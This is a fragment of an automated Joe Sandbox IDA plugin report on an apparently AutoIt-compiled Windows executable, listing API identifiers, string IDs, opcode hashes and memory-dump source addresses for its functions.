                                                                      • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                                      • String ID: -----$SysListView32
                                                                      • API String ID: 2361508679-3975388722
                                                                      • Opcode ID: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                      • Instruction ID: f88fbb49ca5bce363b9cc2f61069a0bde402cf3fc389d028823b3d1da7d43161
                                                                      • Opcode Fuzzy Hash: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                      • Instruction Fuzzy Hash: B351F333A087918AE720EF64D8456DD33A1FB84784F40013AEE4D97B5ADF38D994DB40
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ClassMessageNameParentSend_invalid_parameter_noinfo
                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                      • API String ID: 2019164449-3381328864
                                                                      • Opcode ID: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                      • Instruction ID: 1b6dace1602780c4091eb94f44b998f5ec0fe2ed57f3f57b0c55927859032e1d
                                                                      • Opcode Fuzzy Hash: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                      • Instruction Fuzzy Hash: 33215E22F2C90390FB64BB11E9562B92361AFD17C4F509036DD1EE7697FE2CE506AB00
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                                      • String ID:
                                                                      • API String ID: 1903627254-0
                                                                      • Opcode ID: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                      • Instruction ID: 590ab4819e219e990dc4b02d77d60d3a4f26d24b0b081843c3760cd7c336868c
                                                                      • Opcode Fuzzy Hash: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                      • Instruction Fuzzy Hash: 4D026D62A0CA8686EB50FF29D4851AD6760FB84F88F105132EF4E9BB65EF3CD549D700
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                      • String ID:
                                                                      • API String ID: 3210457359-0
                                                                      • Opcode ID: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                      • Instruction ID: 2c37064e6c727128ddca600ef30d8c4a411390a9cf5cc699a01a819cd1e9a7a6
                                                                      • Opcode Fuzzy Hash: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                      • Instruction Fuzzy Hash: 1A61B321A1C58386FB74BA6598837B92A51BF80794F108531DA1EE36D7EF7DE442FB00
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                      • String ID:
                                                                      • API String ID: 1957940570-0
                                                                      • Opcode ID: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                      • Instruction ID: a4b901dd13e952a70fa9ec31b1f72dbfc09624a0c861eee212f5fe01111836c4
                                                                      • Opcode Fuzzy Hash: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                      • Instruction Fuzzy Hash: 1D215932919B8182E750EF42E44A36AB7A0F788FDAF444125DA8D93B65DF3CD1088B00
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                      • String ID: ?
                                                                      • API String ID: 500310315-1684325040
                                                                      • Opcode ID: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                      • Instruction ID: 976a484d1b9d89a5c73164acf80a26dc8b8174ee82f1380f6940ed23fbdb952d
                                                                      • Opcode Fuzzy Hash: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                      • Instruction Fuzzy Hash: EC61F232A0C64286E714FF25E8425A977A4FF44784F442136EA4DE3A96EF3CE480E790
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                      • API String ID: 3721556410-2107944366
                                                                      • Opcode ID: c2c051044bb7c7ddb3348d31f55c8e9a75bf2736cbd24ec39817eaf22698c765
                                                                      • Instruction ID: f10674173ccc3d93f0c0e7d61bc5edf46637e2e4e88c9d4e8163d87aa509388a
                                                                      • Opcode Fuzzy Hash: c2c051044bb7c7ddb3348d31f55c8e9a75bf2736cbd24ec39817eaf22698c765
                                                                      • Instruction Fuzzy Hash: 3E617F32A18A5295EB40FF61E8825ED3B60FB44B98F501132DD1DE7BAAEF38E445D340
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                      • String ID: SeDebugPrivilege
                                                                      • API String ID: 2533919879-2896544425
                                                                      • Opcode ID: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                      • Instruction ID: 8fae3e57b5afe333fe6aef2ff1a04d9e49755634cb8bc0d8dc65a1c953e4b112
                                                                      • Opcode Fuzzy Hash: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                      • Instruction Fuzzy Hash: E9514062A0C64286FB14FB25D5923B86B60FF84B85F068831D60DD7AA3EF7CE5459B04
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Window$LongMessageSend$Show
                                                                      • String ID: '
                                                                      • API String ID: 257662517-1997036262
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoad_invalid_parameter_noinfo
                                                                      • String ID: blank$info$question$stop$warning
                                                                      • API String ID: 4060274358-404129466
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Messagewprintf
                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                      • API String ID: 4051287042-3128320259
                                                                      Similarity
                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                      • String ID:
                                                                      • API String ID: 1211466189-0
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
                                                                      • String ID:
                                                                      • API String ID: 50796853-0
                                                                      Similarity
                                                                      • API ID: ShowWindow
                                                                      • String ID:
                                                                      • API String ID: 1268545403-0
                                                                      Similarity
                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 3864802216-0
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      Similarity
                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                      • String ID:
                                                                      • API String ID: 2550207440-0
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      Similarity
                                                                      • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                                      • String ID:
                                                                      • API String ID: 3401586794-0
                                                                      Similarity
                                                                      • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
                                                                      • String ID: DllGetClassObject
                                                                      • API String ID: 668425406-1075368562
                                                                      Similarity
                                                                      • API ID: LongMessageSendWindow
                                                                      • String ID:
                                                                      • API String ID: 3360111000-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: ErrorLastinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 4170576061-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                      • String ID:
                                                                      • API String ID: 161812096-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                      • String ID:
                                                                      • API String ID: 395352322-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: AllocByteCharMultiStringWide
                                                                      • String ID:
                                                                      • API String ID: 3603722519-0
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                      • String ID: Msctls_Progress32
                                                                      • API String ID: 1025951953-3636473452
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                      • String ID:
                                                                      • API String ID: 3220332590-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                      • String ID:
                                                                      • API String ID: 3859894641-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 564229958-0
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %.15g$0x%p$False$True
                                                                      • API String ID: 0-2263619337
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
                                                                      • String ID:
                                                                      • API String ID: 383626216-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                      • String ID:
                                                                      • API String ID: 1413079979-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDevice$Release
                                                                      • String ID:
                                                                      • API String ID: 1035833867-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                      • String ID:
                                                                      • API String ID: 43455801-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Virtual
                                                                      • String ID:
                                                                      • API String ID: 4278518827-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                      • String ID:
                                                                      • API String ID: 179993514-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                      • String ID:
                                                                      • API String ID: 146765662-0
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF6439BBF47), ref: 00007FF6439BCE29
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: BuffCharLower
                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                      • API String ID: 2358735015-567219261
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                      • API String ID: 4237274167-1221869570
                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 00007FF643990EDB
                                                                        • Part of subcall function 00007FF643990B90: CharUpperBuffW.USER32(?,?,00000001,00007FF643990F61), ref: 00007FF643990C6A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: BuffCharForegroundUpperWindow
                                                                      • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                      • API String ID: 3570115564-1994484594
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                      • API String ID: 3964851224-769500911
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                                      • String ID: \*.*
                                                                      • API String ID: 3196045410-1173974218
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                      • String ID:
                                                                      • API String ID: 3113390036-3916222277
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                      • String ID: SysAnimate32
                                                                      • API String ID: 4146253029-1011021900
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                      • Instruction ID: ab891557e9f8151ce224631bee92363b8bd7ea85e6ea325279b59c26764bd700
                                                                      • Opcode Fuzzy Hash: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                      • Instruction Fuzzy Hash: B2F04F21A1DA4281EF84BB51F49627963A0EF88790F881039E95FD6666EF3CD488DB00
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 03f3b3863cf3428f55316b0c9d809bb68f76fa44e49f8ab79cf537312fbddc30
                                                                      • Instruction ID: 6b74d818f01e9010544a4d7e39e07e4dbf5394f2ee56bd92d433393450fbe142
                                                                      • Opcode Fuzzy Hash: 03f3b3863cf3428f55316b0c9d809bb68f76fa44e49f8ab79cf537312fbddc30
                                                                      • Instruction Fuzzy Hash: E0A1D163A0E78246FB20BA6094123B96691AF007A4F585635DE6DE67C7FF7CE444A380
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: ErrorLasthtonsinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 2227131780-0
                                                                      • Opcode ID: 2687bdde0b8c036ecf5149386cf56eefd3a397ebd3684ed4d5c765f9e124f73b
                                                                      • Instruction ID: 458de81590beb8b81b6c3f6727c471de980b4a92786e910b6f9b27426a1bcc7a
                                                                      • Opcode Fuzzy Hash: 2687bdde0b8c036ecf5149386cf56eefd3a397ebd3684ed4d5c765f9e124f73b
                                                                      • Instruction Fuzzy Hash: AAA1C122A0CA8282EB50FB26D5522FD6790FF85B94F504531DE5EDBB97EE3CE501A700
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 3488606520-0
                                                                      • Opcode ID: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                      • Instruction ID: 040e943ea4e9ceadee5256c00962de64da3e23912e8c368323166091e34a534f
                                                                      • Opcode Fuzzy Hash: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                      • Instruction Fuzzy Hash: 4C819B22B0869286EB04FF22D4566AC27A4BB48FD4F058035DE1EEBB97EF38D401D740
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                                      • Instruction ID: 334217190d4aeda6d0aea32925de3024c3e38485b1c4022a6ed1b841d188ef41
                                                                      • Opcode Fuzzy Hash: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                                      • Instruction Fuzzy Hash: 8981AF23E2C61385F760BF2594826FD26A1BB44B86F404135DD0EE76D6EF3DA48AE710
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                      • String ID:
                                                                      • API String ID: 3451389628-0
                                                                      • Opcode ID: 89aa832704e6ec4e649f843465dc4667122b6c3ad4f4f569cdb76aac4797b556
                                                                      • Instruction ID: 9ef285cc24e5cff36f0ce24b3c32c83541dea51b5926393ec3338d72fabad5de
                                                                      • Opcode Fuzzy Hash: 89aa832704e6ec4e649f843465dc4667122b6c3ad4f4f569cdb76aac4797b556
                                                                      • Instruction Fuzzy Hash: A4711862B1CA429AEB10FFA5D1923FC2760EB85B88F418531DA0DE7A97EF38D105D744
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                      • String ID:
                                                                      • API String ID: 3659116390-0
                                                                      • Opcode ID: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                                      • Instruction ID: 56b8304f95b4c83fae3c2d163cd2110f81e8cbf91fa021c630c2dbacace5adfe
                                                                      • Opcode Fuzzy Hash: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                                      • Instruction Fuzzy Hash: 3E51B133E18A5285E710EB25E4853AC77B0FB44B98F048135DE4AE7A9AEF38D185D700
                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6439BC2BF), ref: 00007FF6439BD176
                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6439BC2BF), ref: 00007FF6439BD217
                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6439BC2BF), ref: 00007FF6439BD236
                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6439BC2BF), ref: 00007FF6439BD281
                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6439BC2BF), ref: 00007FF6439BD2A0
                                                                        • Part of subcall function 00007FF643944120: WideCharToMultiByte.KERNEL32 ref: 00007FF643944160
                                                                        • Part of subcall function 00007FF643944120: WideCharToMultiByte.KERNEL32 ref: 00007FF64394419C
                                                                      Similarity
                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                      • String ID:
                                                                      • API String ID: 666041331-0
                                                                      • Opcode ID: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                      • Instruction ID: 91ef993f425af69a280606b94a6d6411a25f1b04a19f4813f03c1dada05c78aa
                                                                      • Opcode Fuzzy Hash: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                      • Instruction Fuzzy Hash: 70514736A08F4685EB04FF56D9821AC73A4FB98B94B5A4432DE4EE7396EF38D441D300
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                      • String ID:
                                                                      • API String ID: 4136290138-0
                                                                      • Opcode ID: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                      • Instruction ID: 40cbba250ccbec4964dcae841699390b9c40372222c0e89977e8d4f16ddc2f4b
                                                                      • Opcode Fuzzy Hash: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                      • Instruction Fuzzy Hash: 31516533628A89D2EB50EF16D4857AD33B4FB84B84F428122CB4D83764EF39E458C700
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                                      • Instruction ID: a2da2c5ef856f7e2ce3436a36c0a5fdf48bc917dc86a64a70d78330a7289dbe4
                                                                      • Opcode Fuzzy Hash: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                                      • Instruction Fuzzy Hash: 9751E43260D78285E768BF2194421397794EF41BA0F246335DEADE76D6EE3CD441E740
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                      • String ID:
                                                                      • API String ID: 2832842796-0
                                                                      • Opcode ID: e4b18a81e438ec06308beac1eec7ff5c499c44309205d2103c2697249781d9b3
                                                                      • Instruction ID: 3d2caeff26d15e7b4a75b80039a79830b4fae39a33433a9d94a8199adfdaf843
                                                                      • Opcode Fuzzy Hash: e4b18a81e438ec06308beac1eec7ff5c499c44309205d2103c2697249781d9b3
                                                                      • Instruction Fuzzy Hash: 9D511B26A1CA4682DB14FF26D4921A97760FB88F94B148432EF9ED77A6DF3CD440D700
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                      • String ID:
                                                                      • API String ID: 4210589936-0
                                                                      • Opcode ID: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                      • Instruction ID: 4649a34f34b7e05967072cac32f91de99d360d0ad6be04035a36e63109fd91ad
                                                                      • Opcode Fuzzy Hash: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                      • Instruction Fuzzy Hash: F251E032B0D6828BE754FF31C6415A977A0FB45794F001231EE6AE3796DF38E4A19B00
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: MessagePostSleep$RectWindow
                                                                      • String ID:
                                                                      • API String ID: 3382505437-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                      • String ID:
                                                                      • API String ID: 2256411358-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Window$ForegroundPixelRelease
                                                                      • String ID:
                                                                      • API String ID: 4156661090-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                      • String ID:
                                                                      • API String ID: 2117695475-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3897988419-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 3741023627-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                      • String ID:
                                                                      • API String ID: 2833360925-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                      • String ID:
                                                                      • API String ID: 2625713937-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                      • String ID:
                                                                      • API String ID: 179993514-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                      • String ID:
                                                                      • API String ID: 179993514-0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize
                                                                      • String ID: .lnk
                                                                      • API String ID: 948891078-24824748
                                                                      • Opcode ID: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                                      • Instruction ID: 0179f57508dc96c4eaaeb54c44c4e40d7c86ca882b9e1bb27a09603c8b30fd9d
                                                                      • Opcode Fuzzy Hash: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                                      • Instruction Fuzzy Hash: E4D19062B1CA4681EB10FB25D4922EE6B60FB84B88F405431EE4ED7BA6EF3CD545D740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: $*
                                                                      • API String ID: 3215553584-3982473090
                                                                      • Opcode ID: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                                      • Instruction ID: 1626da13ace68099210197c143d96476d12ff39572c4466a9149f3d43308a130
                                                                      • Opcode Fuzzy Hash: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
